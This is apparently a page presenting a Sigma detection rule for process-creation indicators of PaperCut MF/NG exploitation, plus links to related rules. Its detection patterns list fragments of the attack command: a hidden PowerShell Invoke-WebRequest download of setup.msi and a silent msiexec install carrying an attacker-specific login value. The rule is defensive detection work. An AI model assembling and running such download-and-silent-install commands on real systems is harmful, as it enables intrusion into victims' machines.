PaperCut MF/NG Exploitation Related Indicators
Detects exploitation indicators related to PaperCut MF/NG Exploitation
Sigma rule (View on GitHub)
1title: PaperCut MF/NG Exploitation Related Indicators
2id: de1bd0b6-6d59-417c-86d9-a44114aede3b
3status: test
4description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
5references:
6 - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
7 - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
8author: Nasreddine Bencherchali (Nextron Systems)
9date: 2023-04-25
10tags:
11 - attack.execution
12 - detection.emerging-threats
13logsource:
14 category: process_creation
15 product: windows
16detection:
17 selection_1:
18 CommandLine|contains|all:
19 - ' /c '
20 - 'powershell'
21 - '-nop -w hidden'
22 - 'Invoke-WebRequest'
23 - 'setup.msi'
24 - '-OutFile'
25 selection_2:
26 CommandLine|contains|all:
27 - 'msiexec '
28 - '/i '
29 - 'setup.msi '
30 - '/qn '
31 - 'IntegratorLogin=fimaribahundq'
32 condition: 1 of selection_*
33falsepositives:
34 - Unlikely
35level: high
References
Related rules
- APT29 2018 Phishing Campaign CommandLine Indicators
- Adwind RAT / JRAT
- Blue Mockingbird
- CVE-2021-1675 Print Spooler Exploitation
- CVE-2021-1675 Print Spooler Exploitation IPC Access